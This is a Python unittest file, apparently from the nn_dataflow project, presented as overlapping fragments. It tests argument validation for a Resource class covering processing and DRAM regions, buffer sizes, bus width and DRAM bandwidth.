"origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2,",
"size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'):",
"array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments.",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth.",
") self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array')",
"self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1),",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region",
"program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from",
"test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _",
"self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self):",
"in the hope that it will be useful, but WITHOUT ANY WARRANTY; without",
".*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): '''",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. '''",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2),",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"_ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"BSD-3 License for more details. You should have received a copy of the",
"of the Modified BSD-3 License as published by the Open Source Initiative. This",
"no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM.",
".*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'):",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'):",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. '''",
"test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512,",
"details. You should have received a copy of the Modified BSD-3 License along",
"''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ =",
"DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM),",
"Modified BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import",
"hope that it will be useful, but WITHOUT ANY WARRANTY; without even the",
"proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2),",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with",
"the Open Source Initiative. This program is distributed in the hope that it",
"''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError,",
"2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1),",
"size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region,",
"import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid",
"Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1),",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): '''",
".*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region')",
"= NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM)",
"should have received a copy of the Modified BSD-3 License along with this",
"nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase):",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'):",
"(2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072,",
"1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid",
"You should have received a copy of the Modified BSD-3 License along with",
"no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False,",
"is distributed in the hope that it will be useful, but WITHOUT ANY",
"dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf.",
"16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. '''",
"0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
".*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. '''",
"_ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
".*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. '''",
"1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self):",
"FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for more details. You",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, )",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'):",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,"
] |
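The error-message pattern these tests expect (TypeError for wrong types, ValueError for out-of-range values, messages prefixed with the class name) suggests a namedtuple that validates its fields in __new__. Below is a minimal sketch of that style covering only three fields; MiniResource, its field subset, and its exact messages are hypothetical illustrations, not the actual nn_dataflow implementation.

# Hypothetical sketch of the validation style the tests above imply: check
# types first (TypeError), then value ranges (ValueError), with messages
# prefixed by the class name so regexes like 'Resource: .*dram_bandwidth.*'
# can match them.
from collections import namedtuple

_FIELDS = ('array_bus_width', 'dram_bandwidth', 'no_time_mux')

class MiniResource(namedtuple('MiniResource', _FIELDS)):
    def __new__(cls, **kwargs):
        ntp = super().__new__(cls, **kwargs)
        if not isinstance(ntp.array_bus_width, int):
            raise TypeError('MiniResource: array_bus_width must be an int.')
        if ntp.array_bus_width <= 0:
            raise ValueError('MiniResource: array_bus_width must be positive.')
        if not isinstance(ntp.dram_bandwidth, (int, float)):
            raise TypeError('MiniResource: dram_bandwidth must be a number.')
        if ntp.dram_bandwidth <= 0:
            raise ValueError('MiniResource: dram_bandwidth must be positive.')
        if not isinstance(ntp.no_time_mux, bool):
            raise TypeError('MiniResource: no_time_mux must be a bool.')
        return ntp

try:
    MiniResource(array_bus_width=0, dram_bandwidth=128, no_time_mux=False)
except ValueError as exc:
    print(exc)   # MiniResource: array_bus_width must be positive.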
# From frankfern/eWorkshop-api: a Django model for workshop service types.
from django.db import models

from eworkshop.utils.models import TimeModel


class ServiceType(TimeModel):
    service_name = models.CharField(max_length=10, blank=False)

    def __str__(self) -> str:
        return self.service_name
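A hypothetical shell or test interaction with the model above; it assumes TimeModel is an abstract base model (e.g. one contributing created/modified timestamps) and that this app's migrations have been applied. Note that max_length=10 means longer names would fail database validation.

# Hypothetical usage; 'Wash' is an illustrative value, not from the source.
wash = ServiceType.objects.create(service_name='Wash')
assert str(wash) == 'Wash'
assert ServiceType.objects.filter(service_name__iexact='wash').exists()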
# Minimal ib_insync example: pull 30 days of hourly EURUSD midpoint bars from
# a locally running TWS/IB Gateway (7497 is commonly the paper-trading port).
from ib_insync import *

ib = IB()
ib.connect('127.0.0.1', 7497, clientId=1)

contract = Forex('EURUSD')
bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D',
                            barSizeSetting='1 hour', whatToShow='MIDPOINT',
                            useRTH=True)

# convert to pandas dataframe:
df = util.df(bars)
print(df[['date', 'open', 'high', 'low', 'close']])
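Since util.df returns a plain pandas DataFrame, ordinary pandas operations follow directly (in a Jupyter notebook, ib_insync's util.startLoop() would typically be called before connecting). A small follow-on sketch:

# Follow-on sketch: index by timestamp, compute hourly midpoint returns, and
# close the API connection when done.
df = df.set_index('date')
hourly_returns = df['close'].pct_change().dropna()
print(hourly_returns.describe())
ib.disconnect()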
# An elementwise affine (loc/scale) bijection written as a flow Transform.
from .transform import Transform
from torch.nn import Parameter
import torch


class Affine(Transform):

    def __init__(self, loc=0.0, scale=1.0, learnable=True):
        super().__init__()
        if not isinstance(loc, torch.Tensor):
            loc = torch.tensor(loc).view(1, -1)
        if not isinstance(scale, torch.Tensor):
            scale = torch.tensor(scale).view(1, -1)
        self.loc = loc.float()
        self.scale = scale.float()
        self.n_dims = len(loc)
        if learnable:
            self.loc = Parameter(self.loc)
            self.scale = Parameter(self.scale)

    def forward(self, x):
        return self.loc + self.scale * x

    def inverse(self, y):
        return (y - self.loc) / self.scale

    def log_abs_det_jacobian(self, x, y):
        return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1)

    def get_parameters(self):
        return {'type': 'affine',
                'loc': self.loc.detach().numpy(),
                'scale': self.scale.detach().numpy()}
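A quick sanity check of the transform, assuming the module above imports cleanly (it needs its package-relative Transform base class): inverse undoes forward, and for an elementwise affine map the log-determinant of the Jacobian is the per-sample sum of log|scale|.

# Hypothetical usage sketch; the loc/scale values are illustrative.
import torch

t = Affine(loc=torch.tensor([[1.0, 2.0]]), scale=torch.tensor([[3.0, 4.0]]),
           learnable=False)
x = torch.randn(5, 2)
y = t.forward(x)
assert torch.allclose(t.inverse(y), x, atol=1e-5)
# Every row equals log(3) + log(4), the sum of log|scale| over dimensions:
print(t.log_abs_det_jacobian(x, y))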
# A pygame player turret with simple accessors for score, lives and position.
import pygame


class Turret:
    def __init__(self, MovementControls):
        self.speed = 40
        self.lives = 3
        self.score = 0
        self.spriteImage = "assets/sprites/turret/shooter.png"
        self.sprite = pygame.image.load(self.spriteImage)
        spriteRect = self.sprite.get_rect()
        self.size = (spriteRect.width, spriteRect.height)
        self.x = 0
        self.y = 0
        self.movementControls = MovementControls

    def getScore(self):
        return self.score

    def setScore(self, score):
        self.score = score

    def addScore(self, scoreDelta):
        self.score += scoreDelta

    def removeScore(self, negativeScoreDelta):
        self.score -= negativeScoreDelta

    def getLives(self):
        return self.lives

    def setLives(self, lives):
        self.lives = lives

    def getSprite(self):
        return self.sprite

    def setX(self, x):
        self.x = x

    def getX(self):
        return self.x

    def setY(self, y):
        self.y = y

    def getY(self):
        return self.y

    def getSize(self):
        return self.size

    def getLocation(self):
        return (self.x, self.y)

    def getRect(self):
        return pygame.Rect(
            self.x, self.y, self.getSize()[0], self.getSize()[1]
        )

    def setMovementControls(self, MovementControls):
        self.movementControls = MovementControls

    def getMovementControls(self):
        return self.movementControls
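A hypothetical collision-check usage: getRect() yields a pygame.Rect, so the standard Rect helpers apply directly. This assumes pygame is initialized and the sprite asset exists on disk (pygame.image.load raises otherwise); the MovementControls argument is irrelevant to the demo, so None is passed.

# Hypothetical usage sketch; coordinates and the enemy rect are illustrative.
import pygame

pygame.init()
pygame.display.set_mode((640, 480))          # a display is needed for blitting
turret = Turret(MovementControls=None)
turret.setX(100)
turret.setY(200)
enemy = pygame.Rect(90, 190, 32, 32)
print(turret.getRect().colliderect(enemy))   # True: the rectangles overlap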
[
"Lines 5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys",
"\"\"\" END \"\"\" import main as program import pytest def test_example(): \"\"\" From",
"as program import pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\"",
"'..') \"\"\" END \"\"\" import main as program import pytest def test_example(): \"\"\"",
"7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3)",
"01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH =",
"and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..')",
"def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H",
"From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes",
"H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert vH == [0,1,1]",
"\"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3)",
"sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import pytest def",
"<reponame>Alasdair-Macindoe/HammingCodes<gh_stars>0 \"\"\" Lines 5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\"",
"import pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v =",
"http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program",
"import main as program import pytest def test_example(): \"\"\" From Lecture 7 -",
"import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import pytest",
"END \"\"\" import main as program import pytest def test_example(): \"\"\" From Lecture",
"6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\"",
"from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import",
"5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0,",
"program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert vH ==",
"program import pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v",
"were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END",
"\"\"\" Lines 5 and 6 were adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import",
"\"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H)",
"v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert",
"SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main",
"adapted from SO code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\"",
"= program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH = program.calculate_syndrome(v,H) assert vH",
"- 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes = program.create_syndrome_dict(7,3) vH",
"Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H = program.get_parity_check(3) syndromes =",
"test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]]) H =",
"\"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import",
"pytest def test_example(): \"\"\" From Lecture 7 - 01 \"\"\" v = program.binary_matrix([[1,1,0,0,0,0,0]])",
"main as program import pytest def test_example(): \"\"\" From Lecture 7 - 01",
"code: http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python \"\"\" import sys sys.path.insert(0, '..') \"\"\" END \"\"\" import main as",
"\"\"\" import main as program import pytest def test_example(): \"\"\" From Lecture 7",
"sys.path.insert(0, '..') \"\"\" END \"\"\" import main as program import pytest def test_example():"
] |
[
